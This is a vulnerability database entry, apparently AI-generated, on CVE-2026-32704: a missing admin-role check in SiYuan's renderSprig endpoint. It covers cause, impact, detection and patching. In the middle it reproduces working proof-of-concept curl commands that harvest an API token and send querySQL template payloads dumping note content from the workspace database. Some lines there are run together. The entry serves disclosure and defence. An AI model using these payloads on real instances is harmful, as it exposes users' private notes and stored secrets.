
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-32704 is an improper authorization vulnerability in SiYuan (b3log/siyuan), a self-hosted note-taking application, where the POST /api/template/renderSprig endpoint is missing the required model.CheckAdminRole middleware check. This allows any authenticated user — including low-privilege API token holders and Publish Service Reader role accounts — to execute arbitrary SQL queries against the workspace database and exfiltrate all note content and metadata. All versions up to and including 3.6.0 are affected; the issue was disclosed and patched on March 13, 2026. It carries a CVSS v3.1 base score of 6.5 (Medium) (GitHub Advisory, GHSA).
The root cause is a missing authorization middleware in kernel/api/router.go: the renderSprig handler is registered with only model.CheckAuth (authentication check), while all other sensitive data endpoints also require model.CheckAdminRole. The renderSprig handler calls model.RenderGoTemplate, which exposes a querySQL template function registered in kernel/sql/database.go that executes raw SELECT statements against the workspace SQLite database without any role validation. An attacker with any valid API token can craft a Go template payload embedding querySQL calls to retrieve arbitrary data from the blocks table and other database objects. This is classified as CWE-285 (Improper Authorization) and CWE-732 (Incorrect Permission Assignment for Critical Resource) (GitHub Advisory).
Successful exploitation allows any authenticated user to dump the full contents of the SiYuan workspace database, including all note content, document hierarchy (hpath), tags, custom attributes, block IDs, and timestamps. Attackers can search notes for sensitive data such as stored passwords, API keys, and personal information. The impact is purely a confidentiality breach — integrity and availability are not affected — but the exposure is particularly severe in shared or enterprise deployments where lower-privilege accounts are expected to be isolated from other users' data (GHSA, GitHub Advisory).
A public proof-of-concept exploit is available in the GitHub Security Advisory, consisting of curl commands that demonstrate full database exfiltration against a live SiYuan instance. The exploit requires only a valid API token or Publish Service Reader credentials, making it accessible to any authenticated user. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.044% (14th percentile), indicating a low but non-negligible probability of exploitation in the near term (GitHub Advisory, GHSA).
/api/system/loginAuth with the access auth code to obtain a session cookie, then query /api/system/getConf to extract the API token:curl -s -X POST http://<target>:6806/api/system/loginAuth \
-H "Content-Type: application/json" \
-d '{"authCode":"<authcode>"}' -c /tmp/siy.cookie
TOKEN=$(curl -s -X POST http://<target>:6806/api/system/getConf \
-b /tmp/siy.cookie -H "Content-Type: application/json" -d '{}' \
| python3 -c "import sys,json; print(json.load(sys.stdin)['data']['conf']['api']['token'])")renderSprig by sending a simple SQL count query:curl -s -X POST http://<target>:6806/api/template/renderSprig \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d '{"template":"{{querySQL \"SELECT count(*) as n FROM blocks\" | toJson}}"}'blocks table:curl -s -X POST http://<target>:6806/api/template/renderSprig \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d '{"template":"{{range $r := (querySQL \"SELECT hpath,content FROM blocks LIMIT 100\")}}{{$r.hpath}}: {{$r.content}}\n{{end}}"}'password, api_key, or token within note content to identify high-value data for exfiltration (GHSA).POST requests to /api/template/renderSprig from non-admin user accounts or unexpected source IPs; requests containing querySQL in the JSON body.POST /api/template/renderSprig calls with Authorization: Token headers from low-privilege accounts; high-frequency requests to this endpoint suggesting automated enumeration.SELECT, FROM blocks, LIMIT) embedded within Go template syntax ({{querySQL ...}}); responses returning large JSON payloads from this endpoint./api/system/loginAuth endpoint followed immediately by /api/system/getConf calls, consistent with automated token harvesting as described in the PoC (GHSA).Upgrade SiYuan to version 3.6.1 or later, which adds the missing model.CheckAdminRole middleware to the renderSprig endpoint. No configuration-based workaround is available for unpatched versions; the fix requires a code change. For shared and enterprise deployments, administrators should audit access logs for unauthorized calls to /api/template/renderSprig, review and restrict API token distribution and Publish Service Reader role assignments, and audit workspace notes for sensitive data (passwords, API keys) that may have been exposed (GitHub Advisory, SiYuan Issue).
The vulnerability was reported by security researcher fg0x0 and disclosed via GitHub's coordinated disclosure process on March 13, 2026. Coverage appeared on security aggregation sites including infinitsec.net, cvefeed.io, and dev.to shortly after disclosure. The OpenSUSE security announce mailing list also referenced the issue in the context of govulncheck vulnerability database updates. No major vendor statements beyond the GitHub advisory or notable threat actor commentary have been identified (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."